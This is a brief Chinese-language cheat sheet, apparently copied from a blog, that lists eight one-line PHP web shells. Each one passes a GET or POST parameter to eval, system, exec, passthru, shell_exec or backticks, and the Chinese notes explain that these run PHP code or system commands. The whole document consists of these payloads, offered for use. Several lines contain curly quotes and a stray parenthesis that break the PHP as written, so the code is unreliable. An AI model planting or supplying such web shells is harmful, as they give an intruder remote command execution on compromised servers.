<?php @eval($_GET[‘phpcode‘]);?>
<?php @eval($_POST[‘phpcode‘]);?>
<?php @system($_GET[‘cmd‘]);?>
<?php @system($_POST[‘cmd‘]);?>
<?php @exec($_POST[‘cmd‘]);?>
<?php @passthru($_POST[‘cmd‘]);?>
<?php @shell_exec($_POST[‘cmd‘]);?>
<?php $cmd=$_POST[‘cmd‘]);`$cmd`;?>
@ + function表示忽略警告。
eval() 是可以执行php代码
system() 是可以执行系统命令
原文:https://www.cnblogs.com/mysticbinary/p/12569345.html